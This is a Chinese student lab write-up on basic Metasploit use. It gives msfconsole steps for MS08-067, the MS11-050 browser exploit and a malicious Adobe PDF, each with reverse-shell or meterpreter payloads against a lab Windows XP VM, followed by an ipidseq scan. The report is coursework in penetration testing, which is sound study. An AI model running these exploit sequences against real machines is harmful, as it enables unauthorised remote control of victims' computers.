20155338 《网络攻防》Exp5 MSF基础应用

20155338 《网络攻防》Exp5 MSF基础应用

基础问题回答

1、 用自己的话解释什么是exploit,payload,encode？

• exploit将真正要负责攻击的代码传送到靶机中，相当于载具
• payload负责执行相应的攻击代码，相当于载荷
• encode是伪装，为了避免payload中坏字符影响功能，相当于编码

实验过程

Windows服务渗透攻击——MS08-067安全漏洞

• 攻击机：kali，ip：172.30.6.185

• 靶机：windows XP SP3，IP地址是172.30.7.99

• 先msfconsole进入msf，再用search ms08_067查询一下针对该漏洞的攻击模块：
  

• 用use exploit/windows/smb/ms08_067_netapi使用该模块,并用show targets查看可以被攻击的靶机的操作系统型号：

• 用show payloads查看可以供我们使用的攻击载：
  

• 从中找到一个可用的攻击载荷generic/shell_reverse_tcp，用set payload generic/shell_reverse_tcp设置payload：

• 用show options查看需要设置的参数：

• 这里需要设置RHOST（靶机IP）和LHOST（Kali的IP），使用set 需设置的参数名 参数值命令即可设置,并设置target选项目标（例如我攻击系统为WIN xp 中文简体 SP3，所以选择34）

• 用show options确认需要设置的参数是否已经设置好：

• 确认参数设置无误后，用exploit指令开始攻击：

• 攻击成功后会获取靶机的shell，可以对其进行操作：

针对浏览器的攻击：ms11_050

• 用search ms11_050查询一下针对该漏洞的攻击模块，并用use windows/browser/ms11_050_mshtml_cobjectelement使用该模块：

• 用info查看该模块的相关信息

• targets信息：

• options信息：

• 用set payload windows/meterpreter/reverse_tcp设置payload，并设置需要设置的参数。

• 用show options确认需要设置的参数是否已经设置好：

• 确认参数设置无误后，用exploit指令开始攻击，攻击成功后会有靶机需要访问的网址：

• 在靶机IE上输入该网址：

• kali中显示session已经创建，输入sessions -i 1，获取靶机的shell，可以对其进行操作

针对客户端的攻击：adobe_toolbutton

• 用search adobe查询一下针对该漏洞的攻击模块：

• 选择一个模块并使用该模块：

• 用show targets查看可以被攻击的靶机的操作系统型号：

• 设置payload攻击载荷，命令set payload windows/meterpreter/reverse_tcp，设置相应参数，实施exploit攻击，发现在/root/.msf4/local/目录下成功生成了一个csj5338.pdf文件：

• 将pdf文件粘贴到靶机win XP

• 在kali中和前几次实验一样打开并设置监听模块use exploit/multi/handler，set payload windows/meterpreter/reverse_tcp，再设置IP以及端口

• 在靶机上打开刚刚那个pdf文件，可以观察到Kali成功获取了靶机的shell，可以对其进行操作：

应用一个辅助模块：ipidseq

• 用show auxiliary查看所有辅助模块，并选择其中的一个，选的是scanner/ip/ipidseq：

• 查看需要设置的参数，设置完成后确认一下，这里可以进行对单一目标主机的扫描，然后就可以开始exploit了。

• 也可以对指定网段的主机进行扫描：

实验总结和收获

这次实验总体流程不算难，但在虚拟机上面我换了很多个，换了几个镜像，总算是用简体中文版成功了，学会了MSF工具的一些常用指令，也认识到在实际的渗透过程中，我们不能完全依靠msf来实现，漏洞也都是很早之前的漏洞，其实在现实生活中中攻击一台计算机还是有一定难度的。还是应该深入学习，加强自己的专业技能。